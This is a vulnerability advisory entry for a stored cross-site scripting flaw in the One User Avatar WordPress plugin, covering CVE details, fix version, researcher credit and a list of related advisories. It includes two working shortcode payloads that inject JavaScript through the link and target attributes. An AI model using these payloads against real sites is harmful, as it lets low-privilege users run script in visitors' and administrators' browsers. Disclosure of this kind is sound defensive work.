One User Avatar < 2.3.7 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24672 | Plugin Vulnerabilities

Description

The plugin does not escape the link and target attributes of its shortcode, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks

Proof of Concept

[avatar link="javascript:alert(origin)"]

[avatar target='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)' link="file"]

Affects Plugins

one-user-avatar

Fixed in 2.3.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

762c506a-f57d-450f-99c0-32d750306ddc

Timeline

Publicly Published

2021-09-20 (about 4 years ago)

Added

2021-09-20 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2024-05-07

Title

gee Search Plus, improved WordPress search <= 1.4.4 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2021-11-08

Title

Bookly < 20.3.1 - Staff Member Stored Cross-Site Scripting

Published

2016-02-08

Title

Huge IT Image Gallery <= 1.7.0 - Reflected Cross-Site Scripting (XSS)

Published

2025-12-07

Title

Make Section & Column Clickable For Elementor <= 2.4 - Authenticated (Editor+) Stored Cross-Site Scripting

Published

2022-05-09

Title

Form Maker By 10Web < 1.14.12 - Admin+ Stored Cross-Site Scripting